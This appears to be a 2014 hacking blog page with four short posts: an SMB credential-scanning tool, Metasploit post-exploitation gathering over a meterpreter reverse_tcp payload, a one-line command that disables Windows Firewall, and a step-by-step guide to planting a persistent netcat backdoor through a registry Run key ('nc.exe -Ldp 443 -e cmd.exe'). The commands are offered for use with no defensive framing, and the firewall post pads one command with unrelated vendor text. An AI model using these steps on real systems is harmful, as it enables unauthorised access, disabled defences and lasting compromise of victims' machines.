Saturday, 12 July 2014

keimpx – SMB Credential Scanner


keimpx is an open source tool, released under a modified version of Apache License 1.1. It can be used to quickly check for the usefulness of credentials across a network over SMB. Credentials can be:

  1. Combination of user / plain-text password.
  2. Combination of user / NTLM hash.
  3. Combination of user / NTLM logon session token.

    If any valid credentials has been discovered across the network after its attack phase, the user is asked to choose which host to connect to and which valid credentials to use, then he will be prompted with an interactive SMB shell where the user can:

    1. Spawn an interactive command prompt.
    2. Navigate through the remote SMB shares: list, upload, download files, create, remove files, etc.
    3. Deploy and undeploy his own service, for instance, a backdoor listening on a TCP port for incoming connections.
    4. List users details, domains and password policy.



      Posted by at No comments:
      Labels: ,

      Friday, 11 July 2014

      How to get MUICache Entries in Remote Windows Machine


      According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

      use post/windows/gather/enum_muicache

      msf exploit (enum_muicache)>set payload windows/meterpreter/reverse_tcp

      msf exploit (enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)

      msf exploit (enum_muicache)>set session 2

      msf exploit (enum_muicache)>exploit


      Posted by at No comments:
      Labels: , , ,

      How to Disable Windows Firewall using Metasploit



      Windows Firewall can help protect your PC from hackers and malicious software. In Windows 7, it is still powerful—but we have made it more flexible and easier to use.

      For example, now you can fine-tune the protection and notifications you want for each of your network profiles—Home, Work, and Public. When you are connected to a public network like a library or a coffee shop, you may want to block all incoming connections. At home or work, this might be overkill. Whatever level of protection you choose for your profiles, you will be able to switch between them with ease.

      Command : 

      netsh firewall set opmode disable 

      Posted by at No comments:
      Labels: , ,

      Thursday, 10 July 2014

      How to Install Netcat Backdoor on a Remote Machine Using Metasploit


      When an attacker successfully compromise a system they need to maintain the connection, that's why the attacker usually installing backdoor on victim computer for future use to make attacker easily connect to victim computer to use victim resource, and collecting data on victim computer.

      1 - we must upload netcat to the remote system.
      Command :
      meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

      2 - now we edit in registry to have netcat execute on start up and listen on port 443
      Command :
      meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

      3 - add our NetCat into start up process
      Command :
      meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

      4 - To check our backdoor in autorun process or not
      Command :
      meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

      VIDEO :


      Posted by at No comments:
      Labels: ,
      Subscribe to: Comments (Atom)